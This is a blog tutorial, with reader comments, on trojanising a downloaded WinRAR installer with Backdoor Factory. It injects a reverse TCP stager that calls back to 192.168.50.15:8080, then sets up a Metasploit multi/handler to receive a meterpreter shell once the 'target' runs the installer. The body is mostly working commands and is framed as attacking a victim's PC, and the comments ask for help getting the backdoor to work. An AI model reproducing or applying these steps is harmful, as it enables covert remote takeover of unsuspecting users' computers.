Backdoor Factory

Backdoor-Factory is an explosion tool. The goal of Backdoor-Factory that you can patch executable files.
But you have to notice, some exe files, are protected by the default by the developers.
What we gonna do, is to patch a Winrar file.

[LETS MAKE IT WORK]

#1) Go to winrar website, and download the winrar version that you need for your target.
*Our target is a 32bit Windows os, so we gonna download the 32bit winrar for windows*

bf-2

#2) Close the browser, open terminal & type:
assault@kalivm:~$ sudo backdoor-factory
assault@kalivm:~$ sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s show
*We’ve downloaded the file into /Downloads folder. The value -f means file, -s means shell*
*We will get this output. We gonna use: iat_reverse_tcp_stager_threaded*

bf-3

 

*Let’s continue*
*Type*
assault@kalivm:~$ sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080
*The value -H means Host, the value -P means port*
*And we will get thit output*
*Backdoor is asking us what do we want to do. Let’s pick 1 – The .rsrc*

bf-4

 

#3) Open terminal & navigate to:
assault@kalivm:~$ cd ~/backdoored/
assault@kalivm:~/backdoored$ ls
*Copy the wrar540.exe into your target’s PC*

bf-5

 

#4) Open a new terminal tab & type 1 by 1:
assault@kalivm:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/revese_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.50.15
LHOST => 192.168.50.15
msf exploit (handler) > set LPORT 8080
LPORT => 8080
*Let’s type “show options, to see the “full picture”. If everything is OK, go exploit*
msf exploit (handler) > exploit
*Now, let’s run the wrar540.exe on the target’s PC – Once the target will try to install Winrar, he will get this*

 

bf-6

 

bf-7

meterpreter >

 

ENJOY! 🙂

 

Here is an example by Gamer Forever

 

8 Comments on "Backdoor Factory"

  1. It show me a error like

    [*] In the backdoor module
    [*] Checking if binary is supported
    [*] Gathering file info
    [*] Reading win64 entry instructions
    [*] Gathering file info
    [*] Overwriting certificate table pointer
    [*] Loading PE in pefile
    [*] Parsing data directories
    [*] Adding New Section for updated Import Table
    [!] Adding LoadLibraryA Thunk in new IAT
    [!] File has extra data after last section, cannot add new section

    • gamerforever | October 18, 2016 at 1:15 am |

      Hi.
      to help you, in first, i need to know more basic details, like:
      1. You have Kali Linux 2.x? OR Kali 2016.x?
      2. Please type: sudo dpkg -s backdoor-factory
      What is your backdoor-factory version?
      3. What kind of exe file you tried to patch?

  2. hii
    my backdoor factory verison is 3.3.1-0kali1
    i use the winrar.exe file

    • gamerforever | October 23, 2016 at 9:54 am |

      Seems like you have Kali 2016.x
      I’ll be honest with you, i haven’t tried Kali 2016.x yet.
      BTW, your Kali machine is up-to-date to the last update?
      And the winrar.exe file, that you tried to patch, is 32bit or 64bit?

  3. 64 bit

  4. I want to contact you to improve my hacking skills ,

    • gamerforever | November 1, 2016 at 11:42 am |

      For help or questions, feel free to contact me through the website comments OR the YouTube channel (videos comments\Discussion area).
      Thanks.

Comments are closed.